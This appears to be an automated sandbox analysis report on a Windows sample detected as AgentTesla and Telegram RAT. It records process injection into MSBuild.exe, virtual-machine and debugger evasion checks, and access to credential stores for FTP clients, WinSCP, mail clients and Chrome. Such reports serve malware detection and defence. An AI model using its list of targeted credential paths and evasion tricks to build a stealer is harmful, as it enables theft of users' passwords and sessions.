Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe'	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\950pn9[1]

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

File created: C:\Users\user\AppData\Local\Temp\otddrgbqdnft

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@5/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0044D712 GetLastError,FormatMessageW,

1_2_0044D712

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_00446F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

1_2_00446F5B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_004031F2 FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_004031F2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.256550892.0000000005380000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.256550892.0000000005380000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_00427795 push ecx; ret		1_2_004277A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00F2B57F push edi; retn 0000h		3_2_00F2B581

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_00403EC5 LoadLibraryA,GetProcAddress,

1_2_00403EC5

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0041F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_0041F78E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368

Thread sleep time: -14757395258967632s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 361			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 9482			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0041E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_0041E47B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0041DD92 GetFileAttributesW,FindFirstFileW,FindClose,

1_2_0041DD92

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW8
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWk
Source: MSBuild.exe, 00000003.00000002.520863335.0000000005DA0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0040374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

1_2_0040374E

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_004346D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

1_2_004346D0

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_00403EC5 LoadLibraryA,GetProcAddress,

1_2_00403EC5

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_00437CF0 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_00437CF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_01C70095 mov eax, dword ptr fs:[00000030h]	1_2_01C70095
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_051606DA mov eax, dword ptr fs:[00000030h]	1_2_051606DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_0516099F mov eax, dword ptr fs:[00000030h]	1_2_0516099F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_051609DE mov eax, dword ptr fs:[00000030h]	1_2_051609DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_051608EE mov eax, dword ptr fs:[00000030h]	1_2_051608EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Code function: 1_2_05160A1C mov eax, dword ptr fs:[00000030h]	1_2_05160A1C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_009EEC48 LdrInitializeThunk,

3_2_009EEC48

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_00428E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00428E3C

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AF0008

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

1_2_0041F78E

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0040374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

1_2_0040374E

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe'

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0043BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_0043BE31

Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_004240DA GetSystemTimeAsFileTime,__aulldiv,

1_2_004240DA

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe

Code function: 1_2_0041E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_0041E47B

Stealing of Sensitive Information:

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2512, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe PID: 4588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2512, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Source: Yara match	File source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2512, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2512, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware2.17994.exe PID: 4588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2512, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
